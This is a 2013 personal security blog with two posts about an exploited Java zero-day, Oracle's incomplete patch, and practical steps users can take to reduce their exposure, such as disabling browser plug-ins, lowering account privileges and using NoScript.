Wiz's Computer and Website Security Blog

January 17, 2013

It was 5 days and a few hours ago that I published a blog article about a recent Java vulnerability being exploited in the wild. In it I advised my readers to disable Java plug-ins from running in their browsers, or to uninstall Java altogether.

Then, three days later, on Jan 14, 2013, Oracle, the keeper and maintainer of the Java code, released an out-of-band patch to plug the vulnerability that was the cause of the exploits. This was done with the release of Java 7 update 11.

However, on Wednesday, Jan 16, 2013, Trend Micro researchers posted findings that revealed that the Oracle patch was incomplete and left a related attack vector open. A few hours later, a high ranking admin on a malware distribution forum offered to sell a working exploit of this new zero day exploit for a starting bid of $5,000 USD (see Brian Krebs' article), to two more individuals (he had already sold one copy). Within a short time his offer was taken down, leading Brian Krebs to postulate that the bidding had ended and all three copies of the hardened and ready to go exploit had been sold.

I know that there are some business programs and commercial web pages that operate with Java Applets, requiring users to have Java enabled in their browsers, and/or operating systems. These people cannot just uninstall Java hodge-podge. They want a workable method of keeping Java, but reducing their exposure to malware sneak attacks. Let's see if I can help a little.

First of all, Java can be uninstalled easily from most Windows computers, via the (Add/Remove) Programs (and Features) applet in the Windows Control Panel. All properly installed versions of Java will be listed in the list of installed programs which can be uninstalled, via a button press.

But, if you must keep Java on your computer, to use a mandatory program or website, here are some practical methods you can use to limit your risk of malware infection via Java. They are listed in what I consider to be the most easily deployed order.

1. Go to Control Panel (Windows), find the Java icon, open it, update to the current version, then reboot.
2. The newest version has a security level slider and a checkbox to disable Java plug-ins from your browsers. Set the security slider to the high or highest setting. Close and re-open your browser to get this to take effect.
3. If you only need Java for a desktop or network application, not a website, uncheck the checkbox labeled: "Enable Java content in the browser" then apply the change.
4. Browse with the most current version of Firefox. Firefox now disables Java applets by default and asks you if you wish to allow them to run when Java Applets are encountered on a web page.
5. Every Java exploit kit I have encountered relies upon JavaScript functions to load the appropriate malware Applet .jar file to exploit your PC. For better protection, install the NoScript Add-on for Firefox and allow it to use the default settings (which you must read about before using it). NoScript blocks both Java and JavaScript by default, unless you explicitly allow them to run. If your browser does not receive the redirection commands, or exploit detection functions, nothing happens automatically. In that case, watch out for prompts to manually install a malicious Java Applet!
6. Many zero-day exploits, as well as nth day exploits assume that the user is logged in with administrator privileges, or with UAC prompts disabled. This enables silent, drive-by exploits to install malware into the operating system with no user interaction. Watch the video on the Malwarebytes' blog to see such an exploit in action.
7. In view of how malware exploits use administrator level privileges to do their dirty work, consider lowering your privileges for the computer account you normally use to browse the Internet and run productivity applications. Read these articles for more details: (1) (2) (3)
8. I can't tell you what malware protection to use, but I sure as my name's Wiz can recommend some that I use. I use a 4-fold approach to secure my PCs: (1): I operate with reduced user privileges; (2): I run Malwarebytes' Anti-Malware; (3): I run the current version of Trend Micro Internet Security; (4): I browse with the current version of Firefox, with the NoScript Add-On installed and enabled.
9. Despite all of the above protections there is one more exploit vector: The weak link that exists between the chair and the keyboard. Use common sense while browsing the 'net. Unexpected alert boxes, pop-up scans and web page redirects are not business as usual. If something seems wrong, assume that it is and back out and close your browser, then scan for malware in the browser cache or temporary Internet files. Don't blindly allow programs to run or install just because a pop-up tells you to, especially if it is an "unsigned" or "Self-signed" program.

I hope this helps keep you safe from Java exploits. Doing the things I suggest will not just block the current zero-day exploits, but those to come.

Posted by Wiz at 12:22 AM | Permalink

back to top ^

January 11, 2013

Once again, Oracle's Java software is in making security news for being exploited in most major exploit kits via a new zero-day vulnerability. A zero-day vulnerability is where a proof of concept exploit is disclosed before the software vendor has a chance to create a patch to block that attack vector. At this time, Oracle has not released a patched version of Java and there is no known workaround. The next regularly scheduled Java update is set for February 19, 2013.

UPDATE January 14, 2013

Oracle has just released an out-of-band sudden patch for the new vulnerability in its Java Virtual Machine. The patch is called Java 7 update 11, available here.

The most dangerous and exploited type of Java is the kind that is used as a "plug-in" for web browsers (Internet Explorer, Google Chrome, Firefox, Safari, Opera, etc.). You see, when you install Java on your computer or hand-held devices, it installs both as an executable package that can be used by desktop productivity and entertainment applications, and as a plug-in for each brand of web browser you have installed on that device. The browser plug-in is responsible for running Java Applets in your browser. These Applets are supposed to be contained within a programmed-in software boundary called a "sandbox" - but they are notorious for being exploited to jump out of the sandbox and into the operating system.

I should point out that Java has been one of the favorite targets of virus and malware exploit authors since the year 1998 (Strange Brew - first Java virus). Over the years Java has been deployed in more and more devices, to the point that Oracle, the current owner, claims that Java is installed on over 3 billion devices Worldwide. Chances seem reasonable that you are using one or more of those 3 billion devices.

Since Java itself can be installed and run on devices that are based on different operating systems, it can be used to download malware to any of those devices by simply detecting the operating system and downloading the appropriate binary program for exploiting it. The typical entry point for exploitation is a web browser. The method by which the browser is caused to run malicious codes can be clicking on obfuscated poisoned links in email scams, hidden "iframes" that draw the attack codes into otherwise legitimate websites (and your browser), or JavaScript redirects that were injected into the head or end sections of compromised web pages.

Java is exploited constantly, for both old and new versions and vulnerabilities, for at least three reasons: (1) It is found on 3 billion devices; (2) most people don't even know if they have Java installed on whatever devices they are using to connect to the Internet; (3) Oracle is very slow to patch Java vulnerabilities that they are notified about.

What you can do to protect your devices from Java exploits

You can take the following steps to protect your computers, or hand-held devices from Java exploits.

1. Disable Java plug-ins from running in all installed web browsers
2. Find out what version, if any, of Java is installed.and active
3. Uninstall any non-current versions of Java
4. Install only the most current version of Java for your operating system
5. Uninstall Java altogether! (Windows | Mac | Linux)
6. Operate your computer with reduced user privileges (not as an Administrator) (1) (2) (3)
7. Use only legally obtained operating systems and keep up with updates and patches
8. Regularly check for and apply updates for all third party browser add-ons and plug-ins (not just Java
9. Defend against exploit kits by disabling JavaScript (and Java) by default, unless you specifically want to allow scripting to run. Do this by installing the NoScript add-on to Firefox, or the ScriptNo extension for Google Chrome. Internet Explorer users are and probably will always remain vulnerable to scripting attacks, unless you disable "Active Scripting" altogether. ;-(

The reason for exploit kits is to compromise as many computing devices as possible for the following nefarious purposes:

1. To install spamming malware


2. To turn your device into an attack zombie in a DDoS botnet


3. To make your computer available as a web proxy for criminals to hide behind as they carry on criminal activities and scams


4. To silently install keylogging and/or bank account monitoring malware Trojans, to steal funds from your financial accounts


5. To use keyloggers to steal login credentials to your website control panels, Facebook, Twitter, LinkedIn, MySpace, eBay etc.


6. To install Trojans that search for particularly desirable and sensitive documents and upload copies to spies abroad


7. Some will download rogue security software that presents alarming fake virus scans of your computer, demanding money to remove the perceived non-existent threats


8. Currently, a lot of exploit kits download what is commonly called "Police Ransomware" to your computer, locking you out of using it unless you pay a fine (ransom). DO NOT PAY THE FINE! Have the PC disinfected by a professional.


9. If you work in a Governmental, or Defense, or public utility, Nuclear Energy, or Financial industry, custom written exploit kits might be used in "spear phishing" email attacks to deliver real spyware to your PC and even the entire network. Company, or very high level or secret documents can be stolen by Trojans written for this purpose.


10. Above all of these things, all exploit kits install a "backdoor" into the infected computer or device. This allows the cybercriminals running the exploit to visit your computer any time they wish, download other malware to it, or use it to do illegal things (e.g. transfer stolen funds from bank accounts) leading to your IP address, then to your name and address if the Police become involved.

If you know or even think that you may have clicked on a link leading to an exploit kit, you need to scan for malware now. You can use the free online Housecall scanner from Trend Micro, or the stand-alone Microsoft Safety Scanner. If you have no security program installed, or one that is out-dated, or has expired, you can download a trial version of Trend Micro Internet Security (or Anti-Virus+). It is full-feature activated for a month and will remove most malware it detects. It also blocks access to malicious web pages, protecting you from exploit kits.

Posted by Wiz at 6:34 PM | Permalink

back to top ^